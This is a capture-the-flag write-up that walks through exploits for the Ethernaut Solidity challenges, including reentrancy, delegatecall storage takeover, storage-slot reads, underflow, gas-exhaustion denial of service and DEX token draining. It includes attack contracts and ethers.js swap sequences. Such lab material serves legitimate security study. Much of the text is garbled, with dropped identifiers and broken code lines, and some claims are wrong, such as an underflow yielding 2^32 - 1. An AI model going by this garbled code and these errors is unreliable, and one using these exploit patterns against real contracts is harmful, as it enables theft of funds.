Ethernaut CTF solutions ⛳️
- Hello Ethernaut
- Fallback
- Fallout
- Coinflip
- Telephone
- Token
- Delegation
- Force
- Vault
- King
- Re-entrancy
- Elevator
- Privacy
- Naught Coin
- Preservation
- Recovery
- MagicNumber
- Alien Codex
- Denial
- Shop
- Dex
- Dex Two
To solve this challenge we need to claim the contract's ownership and withdraw all its balance.
In order to take the ownership
, we have two possible ways:
We send some ethers to the contract, as updating the
state is set on thereceive
fallbackreceive() external payable { require(msg.value > 0 && contributions[msg.sender] > 0); owner = msg.sender; }
Before doing that, we need first to satisfy the condition
contributions[msg.sender] > 0
, to do so, we can just call the functioncontribute()
and send at least1 wei
. -
We call the
function and send an amount of ether that is greater than the contribution of the owner, as updating the owner is set if that condition is satisfied:if(contributions[msg.sender] > contributions[owner]) { owner = msg.sender; }
After that, we can call the withdraw
to take all the contract's balance.
To pass this challenge, we need to take the contract's ownership.
In old Solidity versions, to create a constructor function, we could declare a function with the same name of the Contract. In this challenge, the constructor's function name has a typo error, instead of Fallout
, they set Fal1out
To take the ownership, we can just call the function Fal1out()
NOTE: after trying to run the challenge test, you may get an error saying that File @openzeppelin/contracts/math/SafeMath.sol, imported from contracts/Fallout.sol, not found.
, it is maybe because the Math library is deleted from Openzeppelin in newer versions, you can just downgrade the openzeppelin package in package.json to solve this issue
To win this challenge, we must guess the correct outcome of the flip(bool __guess)
function 10 times in a row.
We notice using unsecured source of randomness in the flip(bool _guess)
function. The function uses the block.number
as a source to generate a random outcome:
uint256 blockValue = uint256(blockhash(block.number - 1));
lastHash = blockValue;
uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 ? true : false;
if (side == _guess) {
return true;
We must call the flip(bool _guess)
function 10 times and pass the correct guess value each time. In other words, we need to pre-calculate the blockValue
before and conclude the correct guess each time because block.value
is the only variable state in the calculus of the side
in the flip function.
to achieve that, we need to create another contract that contains a function that calculates the guess the same way the flip(bool _guess)
does and call the flip(bool _guess)
function attack() public{
bool guess = _guess();
function _guess() private view returns (bool) {
uint256 blockValue = uint256(blockhash(block.number - 1));
uint256 coinFlip = blockValue / Factor;
bool side = coinFlip == 1 ? true : false;
return side;
It is guaranteed that the guess we pass will be the same after calculating a new one inside the flip(bool _guess)
, because both transactions will be mined in the same block, so the block.value
__the only variable state in the calculus of the side
state will be the same.
The whole attack is around the Unsecure source of randomness security concept, read more about it
To beat this challenge, we need to take ownership.
The solution is straight forward if we know the difference between msg.sender
and tx.origin
. If you don't already, read more about them
function changeOwner(address _owner) public {
if (tx.origin != msg.sender) {
owner = _owner;
We just need to create another contract that contains a function that calls the changeOwner(address _owner)
function attack() external onlyOwner {
By invoking the attack()
function, which calls the changeOwner()
function in Telephone
contract, the condition tx.origin != msg.sender
matches, and as a result the owner
state will be updated.
To pass this challenge, we need to hack the contract by taking a large number of tokens.
The contract is written under version ^0.6.0
of Solidity. After inspecting the transfer(address _to, uint _value)
function, we can notice a possibility of having an underflow, and the contract didn't protect itself from that.
function transfer(address _to, uint _value) public returns (bool) {
require(balances[msg.sender] - _value >= 0);
balances[msg.sender] -= _value;
balances[_to] += _value;
return true;
We started with 20 tokens, to increase our balance, we can simply transfer 21 tokens to another address which leads to having an underflow, so our balance will be set to 2^32 - 1.
If you are not familiar with underflow/overflow, read more here
To pass this challenge, we need to take ownership of the Delegation
The only interesting thing in the contract is the fallback()
fallback() external {
(bool result,) = address(delegate).delegatecall(;
if (result) {
We notice that it makes a delegatecall to the Delegate contract. After inspecting the Delegate
contract's code, the only interesting thing is the pwn()
function pwn() public {
owner = msg.sender;
It simply updates the owner
state of the Delegate
contract. We can exploit the Delegation
contract easily as it is using unsafe delegatecall. The steps to take the ownership are:
- We first encode the signature of
function - We make a transaction to the
contract in order to invoke thefallback()
method and sending along the encoded signature
- The
method will delegatecall theDelegate
contract passing the signature ofpwn()
, in other words, it is going to call thepwn()
function of theDelegate
- The
- The
function insideDelegate
contract will be executed in the context of theDelegation
contract, so the owner's state updateowner = msg.sender
will be in the context of theDelegation
After the transaction is mined, the ownership will be taken.
This challenge is straightforward for the ones who know the functionality of delegatecall
We have a Force contract that has 0 balance, To pass this challenge we need to increase its balance.
For a contract to be able to receive ethers, it must have either a payable function
, or payable receive() function
. The given contract doesn't have any. However, it's possible to forcefully send ether by creating an other contract that has some ethers and defines a function that causes to its destruct using sefldestruct
does not trigger a Smart Contract’s fallback function, it removes the contract from the blockchain and sends the remaining balance to a payable address that is passed as parametere.
function attack() external {
To pass this challenge we need to unlock the Vault.
function unlock(bytes32 _password) public {
if (password == _password) {
locked = false;
The _password
we pass must match the private password declared
bytes32 private password;
However, it is possible to read the value of password
even if it is declared as private if we know the EVM Storage Layout
NOTE: a variable declared as private means that other contracts can not access it, but it can be read from outside the Blockchain
If you don't know the attack of Accessing Private Data, read more here.
To access the value of password
, we can follow the following reflection:
variable will be stored in theslot 0
, so 31-bytes are still available inslot 0
's variable size is 32 bytes, so it can not fit in the available space in slot 0, so it will be inserted inslot 1
After we know that the value of
is stored inslot 1
, we can make a simple query to read it, example of that using ethers.js:const storageValue = await ethers.provider.getStorageAt(volt.address, 1)
After we get the value of the password, we can simply call the unlock(bytes32 _password)
and the vault will be unlocked.
Test script
For this challenge, we need to be the king, once and for all. After we take the king, someone else can take the king if either:
- he sends an amount of ether greater than our prize
- he is the owner of the contract
receive() external payable {
require(msg.value >= prize || msg.sender == owner);
king = msg.sender;
prize = msg.value;
After the condition require(msg.value >= prize || msg.sender == owner)
is verified and before the new king is set,we will receive our prize via the transfer
low-level function
To prevent someone else to take the king, we can perform a DOS(Denial of Service) into the contract, by creating a contract that reverts when it receives some ether. So when transfer
is executed, the tx will be reverted, hence the king will not be set anymore.
To solve this challenge, we need to steal all the ether stored in the Smart Contract.
After inspecting the Smart contracts' code, we notice that it is vulnerable to the Reentrancy attack.
function withdraw(uint _amount) public {
if(balances[msg.sender] >= _amount) {
(bool result,) ={value:_amount}("");
if(result) {
balances[msg.sender] -= _amount;
The balance's state is updated after an external call.
(bool result,) ={value:_amount}("");
balances[msg.sender] -= _amount;
We can create an attacking contract that performs the Reentrancy attack. If you don't know the Reentrancy attack, read more here
We must get to the elevator's top to beat this challenge.
We notice that the contract is using typecasting
__initiating a contract which supposedly implements the isLastFloor
function defined in the Building
function goTo(uint _floor) public {
Building building = Building(msg.sender);
if (!building.isLastFloor(_floor)) {
floor = _floor;
top = building.isLastFloor(floor);
We need to satisfy two things:
returns true, to pass the if check.- The same
returns false this time, to set thetop
value to true and beat the challenge.
So, we can simply create a new contract that implements the isLastFloot(uint)
and toggles its value to satisfy both conditions.
I don't see any security or vulnerability issue at this level, instead a simple wrong logic implemented in the contract
We need to unlock the contract to beat this challenge.
To unlock the smart contract(change the value of locked
variable to true
), we need to call the function unlock(bytes16 _key)
and pass along the correct key.
It may seem hard to know the correct key value as it is declared private, but for someone who knows how smart contract states are stored in the EVM storage, the challenge will be easy to solve.
bool public locked = true;
uint256 public ID = block.timestamp;
uint8 private flattening = 10;
uint8 private denomination = 255;
uint16 private awkwardness = uint16(block.timestamp);
bytes32[3] private data;
After analyzing the size of the contract's states and their declaration order, we conclude that:
variable is stored inslot 0
variable is stored inslot 1
variable is stored inslot 2
variable is stored inslot 2
variable is stored inslot 2
array elements are stored inslot 3
,slot 4
,slot 5
The unlock
function needs the third element of the data
array which is stored in slot 5
, in bytes16 format.
function unlock(bytes16 _key) public {
require(_key == bytes16(data[2]));
locked = false;
We can query slot 5
to get the value of data[2]
const storageValue = await ethers.provider.getStorageAt(contract.address,5);
And then, transfer it to bytes16
const key = storageValue.slice(0, 34); // 32 chars + 0x
We got our key, we just need to call the unlock
function and the challenge is solved.
Due to compatibility errors that occurred because the challenge contract and ERC20 contracts use different breakpoint solidity versions, I downgraded the challenge Contract to 0.6.0. This downgrade doesn't affect the solution, it is only to passe the compilation error.
There are no tricks or backdoors to pass this challenge, we only need to understand the ERC20 available methods.
To solve this challenge, we need to transfer all our tokens(1000000). Apparently, we can not use the transfer
function as we would need to wait 10 years because it applies the lockTokens
function transfer(address _to, uint256 _value) override public lockTokens returns(bool) {
super.transfer(_to, _value);
modifier lockTokens() {
if (msg.sender == player) {
require(block.timestamp > timeLock);
} else {
However, we can use the approve
method to allow another account to spend all our tokens on our behalf.
await naughtCoin.approve(account1.address, ethers.BigNumber.from('1000000').mul(ethers.BigNumber.from('10').pow('18')));
Then we need to connect to the approved account
and call the function transferFrom
tx = await naughtCoin.connect(account1).transferFrom(
For more details concerning the approve
and transferFrom
functions, read the ERC20 openzeppelin implementation
To pass this challenge, we need to claim ownership of the contract. After carefully reading the contract code, we notice using unsafe delegatecall.
We can exploit the contract as following:
- Update the delegatecall target(timeZone1Library) address to our own
's address. - Re-call the
of thePreservation
contract, and this time, it will delegatecall our ownPreservationAttack
- Create the
function with the same signature and update the owner.
To update the delegatecall target and the owner states, we need to pay attention to the storage layout of both contracts.
address public timeZone1Library;
address public timeZone2Library;
address public owner;
uint storedTime;
uint storedTime;
The Preservation
contract calls an external library in a Delegatecall:
function setFirstTime(uint _timeStamp) public {
timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
the setTimeSignature
is given: bytes4(keccak256("setTime(uint256)"));
So the Preservation
contract delegatescall the setTime
function in Library contract
, the function code is:
function setTime(uint _time) public {
storedTime = _time;
So, after the Preservation
contract delegatecall
the LibraryContract, the setTime
function will be exectued in the context of the Preservation contract. The LibraryContract
updates the storedTime
state which is declared first.(slot0) inside the contract. So the first state declared in slot0 in Preservation
contract will be updated, Hence, the timeZone1Library.
The attack
function in our PreservaionAttack
function attack() external {
Note that we cast the address of the contract to uint because the setTime function requires a uint parameter
So, further delegatescall: timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
will refer to our PreservationAttack
To update the owner, we simply need to create the same storage of Preservation
in our PreservationAttack
via declaring states with the same name, and in the same order. And then create the setTime
function with the same signature that updates the owner state:
contract PreservationAttack {
address public timeZone1Library;
address public timeZone2Library;
address public owner;
uint storedTime;
Preservation public preservation;
constructor(Preservation _address) {
preservation = Preservation(_address);
function attack() external {
function setTime(uint _time) public {
owner = tx.origin;
To make a long story short, we only need to call the attack
function in our PreservationAttack
, and the ownership will be claimed.
Attack Contract | Test script
To solve this challenge, we need to steal the 0.001 ETH stored inside the first initialized SimpleToken
contract. We notice the presence of destroy(address payable _to)
that calls the low level function selfdestruct
function destroy(address payable _to) public {
We can call the destroy
function and pass our address as an argument, and the ether stored inside the contract will be transferred to us. The issue is that the smart contract address is lost, so we need somehow to get it.
To get the smart contract's address, we just need to use Etherscan
as we already have the address of the Factory
contract, and we can check the internal transactions
and get the first SimpleToken
contract deployed.
After getting the contract's address, we can simply interact with the destroy
function after initiating an instance of the contract, an example using ethers.js:
await contract.destroy(0x622900E44841219EcE6CD973Beae9eB79E044a47)
Contract addresses are deterministic and are calculated by keccak256(address, nonce)
where the address is the address of the creator(a smart contract, or EOA), and the nonce is the number of the contracts created by the address in case of smart contracts, or the number of transactions made by the address in case of EOA.
According to the Ethereum Yellow Paper:
The address of the new account is defined as being the rightmost 160 bits of the Keccak hash of the RLP encoding of the structure containing only the sender and the account nonce.
is the primary encoding method used to serialize objects in Etherem's execution layer, its purpose is to encode arbitrarily nested arrays of binary data.
has a built in function to calculate the address of a contract:
const nonce = 1 // nonce 1 refers to the first contract created by the Recovery contract
const lostAddress = ethers.utils.getContractAddress({
from: Recovery.address,
Or, we can use solidity language to calculate the address from scratch:
address lostcontract = address(uint160(uint256(keccak256(abi.encodePacked(bytes1(0xd6), bytes1(0x94), address(<Recovery address>), bytes1(0x01))))));
, 0x94
refer to the RLP for 20 byte address. And 0x01
refers to the nonce 1
To solve this level, we need to provide the Ethernaut with a Solver
, a contract that responds to whatIsTheMeaningOfLife()
with the right number. The smart contract must have at most 10 opcodes
The right number is obviously 42
. A straightforward approach is to write a function that returns 42:
function whatIsTheMeaningOfLife() external pure returns(uint) {
return 42;
However, if we compile this smart contract, we will have diffinetly more than 10 opcodes. It is time to get out of the comfort zone of solidity and build our smart contract using bytecodes. We need a contract that returns 42. Smart contracts run on the Ethereum Virtual Machine(EVM), the EVM understands smart contracts as bytecodes. Contract creation bytecode contains 2 different parts of code that we need to write:
- Create bytecode: only executed at deployment, it tells the EVM to run the constructor to init the contract and store the remaining runtime bytecode in memory
- runtime bytecode: this is what lives in the blockchain, users, and dapps interact with this bytecode. It is where we need to write the logic to return 42.
We know the EVM is a stack-based machine. It contains besides the stack, the memory which is used and cleared after each message call, and a storage which is like the memory but it persists between message calls. Opcodes
are what control the EVM and tell what to execute. Each opcode has a corresponding bytecode. The list of available bytecodes is mentioned in the Ethereum Yellow Paper
We need to return 42
, returning values is handled by the RETURN
opcode, which takes two arguments:
: the position where the value is stored in memorys
: the size of the value to be returned
This means we need first to store the value in memory before returning it. Here is the sequence of the bytescodes:
bytecode | Opcode | Meaning |
602a | PUSH1 2a | Push 2a(42 in decimals) to the stack |
6000 | PUSH 00 | Push 00 to the stack(this will be the memory location) |
52 | MSTORE | mstore(0, 2a): store the value 0x2a in the memory location 0x00 |
After storing the value in the memory, we can return it. The sequence of bytecodes:
bytecode | Opcode | Meaning |
6020 | PUSH1 2a | Push 0x20(32 in decimals) to the stack |
6000 | PUSH 00 | Push 00 to the stack(this will be the memory location) |
f3 | RETURN | return the 32 bytes stored in in memory position 0 |
The sequence of bytescode is: 602a60005260206000f3
We need to replicate the runtime code
to memory, before returning to EVM. The sequence of bytecodes:
bytecode | Opcode | Meaning |
69602a60005260206000f3 | PUSH10 602a60005260206000f3 | Push 10 bytes of code to the stack |
6000 | PUSH 00 | Push 00 to the stack(this will be the memory location) |
52 | MSTORE | mstore(0,0x602a60005260206000f3) // this will store the 10 bytescode padded with 22 zeros on the left |
600a | PUSH1 0a | Push 0x0a(10 in decimals) to the stack |
6016 | PUSH1 16 | Push 0x16(22 in decimals) to the stack |
f3 | RETURN | Return 10bytes stored in memory position 22 |
The final sequence of bytescode is: 0x69602a60005260206000f3600052600a6016f3
Finally we need to deploy the smart contract bytescode using a simple transaction:
web3.eth.sendTransaction({ from: account_address,data: '0x69602a60005260206000f3600052600a6016f3' })
and pass the contract's address to the setSolver
function of the contract challenge:
await contract.setSolver(contract_address)
We need to take ownership to solve this challenge.
After inspecting the contract, we see no state of the owner
. However, the contract inherits the Ownable
contract which declares a private owner address:
contract AlienCodex is Ownable {
bool public contact;
bytes32[] public codex;
contract Ownable {
address private _owner;
So, we can think the states of the AlienCodex
as follow:
address private _owner;
bool public contact;
bytes32[] public codex;
The storage layout of the contract is as follows:
slot 0
: _owner(20 bytes) + contact(1 byte)slot 1
: codex(only the length of the array)- Since
state is a dynamic array, the slot of anindex i
will be calculated using the formula:index_slot = keccak256(1) + index
The smart contract is written under version 0.5.0
, and we notice a vulnerability of underflow:
function retract() contacted public {
In the beginning, the codex length is 0, after calling the retract()
function, it will cause an underflow(0 - 1 = 2^256 -1). So, after calling the retract
function, the length of the codex
array will be 2^256 -1, which seems we have complete control of the whole storage of the contract.
We know that the owner's address is stored in slot 0
, and since the codex
array has full control of the storage, there must be an index of the codex
array that occupies the slot 0
. In another words: slot 0 = keccak256(1) + index
, which gives: index = -keccak256(1)
. We can easily calculate the index using solidity:
uint256 array_slot = uint256(keccak256(abi.encode(uint256(1))));
uint256 index = -array_slot;
After getting the index that occupies the slot 0
(the slot that contains the owner address), we can simply call the function revise(uint i, bytes32 _content)
, and pass our address as the _content argument, but in a bytes32 format:
_target.revise(index, bytes32(uint256(uint160(<OUR ADDRESS>))));
The full Attack contract code to hack the challenge:
contract AlienCodexAttack {
constructor(AlienCodex _target) public {
uint256 array_slot = uint256(keccak256(abi.encode(uint256(1))));
uint256 index = -array_slot;
_target.revise(index, bytes32(uint256(uint160(msg.sender))));
require(_target.owner() == msg.sender, "Attack failed");
To solve this challenge, we need to prevent the owner from receiving ether when someone calls the withdraw
The withdraw
function's logic is as follows:
function withdraw() public {
uint amountToSend = address(this).balance / 100;
// perform a call without checking return
// The recipient can revert, the owner will still get their share{value:amountToSend}("");
// keep track of last withdrawal time
timeLastWithdrawn = block.timestamp;
withdrawPartnerBalances[partner] += amountToSend;
We notice that 1% of the contract's balance is transferred first to the partner, and then to the owner. We can simply become partner by calling the function setWithdrawPartner
and passing our address
function setWithdrawPartner(address _partner) public {
partner = _partner;
After we become the partner, we have control of the first ether transfer:{value:amountToSend}("");
low-level method consumes almost all the gas of the transaction(63/64), so we can create an attacking contract that becomes a partner, and consumes all the gas of the transaction when it receives ether, which will result in reverting the initial transaction, and thus, the owner will not receive ether.
contract DenialAttack {
constructor(Denial _target) {
receive() external payable {
// `invalid` consumes all the remaining gas
// while(true) {}
NOTE1: to consume all the gas, we can use an infinite loop or the invalid() function of assembly NOTE2: starting from version ^0.8.0, assert(false) doesn't consume all the remaining gas
This level requires us to buy the product for less than the price asked.
This challenge is similar to Elevator challenge, but this time the function price()
defined in the interface is a view
function, so it can not maintain a state variable. However, we can still make external calls to functions that are pure
or view
Therefore, to return two values from the price()
function, we can return a value based on the isSold
function price() external view returns(uint) {
return target.isSold() ? 1 : 101;
The complete Attack contract code:
contract ShopAttack {
Shop public target;
constructor(Shop _target) {
target = Shop(_target);
function attack() external {;
function price() external view returns(uint) {
return target.isSold() ? 1 : 101;
To beat this level we need to drain one of the tokens(token1
- token2
) from the Dex contract.
After inspecting the contract's code, we notice that the method getSwapPrice
determines the exchange rate between tokens in the Dex
function getSwapPrice(address from, address to, uint amount) public view returns(uint){
return((amount * IERC20(to).balanceOf(address(this)))/IERC20(from).balanceOf(address(this)));
The division won't always calculate a perfect integer, but a fraction. And in Solidity, there's no fraction, instead the division rounds toward zero(example: 3/2 = 1). Hence, the vulnerability originates from this method.
To drain one of the tokens, we will swap all of our token1
to token2
, then swap all of our token2
to token1
, and so on.
Here's the balance & price history
Contract | Player | ||
Token1 | Token2 | Token1 | Token2 |
100 | 100 | 10 | 10 |
110 | 90 | 0 | 20 |
86 | 110 | 24 | 0 |
110 | 80 | 0 | 30 |
69 | 110 | 41 | 0 |
110 | 45 | 0 | 65 |
0 | 90 | 110 | 20 |
For the last swap, from token2 to token1, and after a simple math equation, swapping 45
tokens of token2
is enough to drain all the 110
tokens of token1
Here are the swap transactions using ethers.js
First, we need to call the approve
function to allow the contract to transfer all of our tokens with an enough allowance, so we don't have to approve again on each transaction:
tx = await dex.approve(dex.address, 400)
await tx.wait()
tx = await dex.swap(token1.address, token2.address, 10)
await tx.wait()
tx = await dex.swap(token2.address, token1.address, 20)
await tx.wait()
tx = await dex.swap(token1.address, token2.address, 24)
await tx.wait()
tx = await dex.swap(token2.address, token1.address, 30)
await tx.wait()
tx = await dex.swap(token1.address, token2.address, 41)
await tx.wait()
tx = await dex.swap(token2.address, token1.address, 45)
await tx.wait()
We need to drain all of the tokens from the DexTwo contract.
This level is similar to Dex level, with slight modification in the swap
function swap(address from, address to, uint amount) public {
require(IERC20(from).balanceOf(msg.sender) >= amount, "Not enough to swap");
uint swapAmount = getSwapAmount(from, to, amount);
IERC20(from).transferFrom(msg.sender, address(this), amount);
IERC20(to).approve(address(this), swapAmount);
IERC20(to).transferFrom(address(this), msg.sender, swapAmount);
The swap
function doesn't check that from
and to
must be token1
and token2
The method getSwapPrice
determines the exchange rate between tokens in the Dex:
function getSwapPrice(address from, address to, uint amount) public view returns(uint){
return((amount * IERC20(to).balanceOf(address(this)))/IERC20(from).balanceOf(address(this)));
So, for us to drain all the tokens from the DexTwo contract, we create an EvilToken
contract with pre-minted tokens(400 is enough) and use it to swap both tokens.
The DexTwo
contract starts with 100
tokens of token1
. We need to swap x
amount of EvilToken
to get all the 100
tokens of token1
. Having this in mind, given the formula of the exchange rate, and after solving a simple math equation, we conclude that swapping 100
of EvilToken
will result in draining all the 100
tokens of token1
Following the same reasoning, we conclude that swapping 200
tokens of EvilToken
will result in draining all the 100
tokens of token2
. Here's the balance & price history:
Contract | Player | ||||
Token1 | Token2 | EvilToken | Token1 | Token2 | EvilToken |
100 | 100 | 100 | 10 | 10 | 300 |
0 | 100 | 200 | 110 | 10 | 200 |
0 | 0 | 400 | 110 | 110 | 0 |
We just need now to make transactions to the DexTwo
contract. Using ethers.js
First, we need to call the approve
function on both DexTwo
& EvilToken
to allow the contracts to transfer all of our tokens with enough allowance, so we don't have to approve again on each transaction:
tx = await evilToken.approve(dexTwo.address, 300)
await tx.wait()
tx = await dexTwo.approve(dexTwo.address, 400)
await tx.wait()
We need first to transfer 100
of EvilToken
to the DexTwo
contract to start, so we can solve the rate exchange equation later(avoiding having 2 unknowns in the equation).
tx = await evilToken.transfer(dexTwo.address, 100);
await tx.wait();
Swaps transactions:
tx = await dexTwo.swap(evilToken.address, token1.address, 100);
await tx.wait();
tx = await dexTwo.swap(evilToken.address, token2.address, 200);
await tx.wait();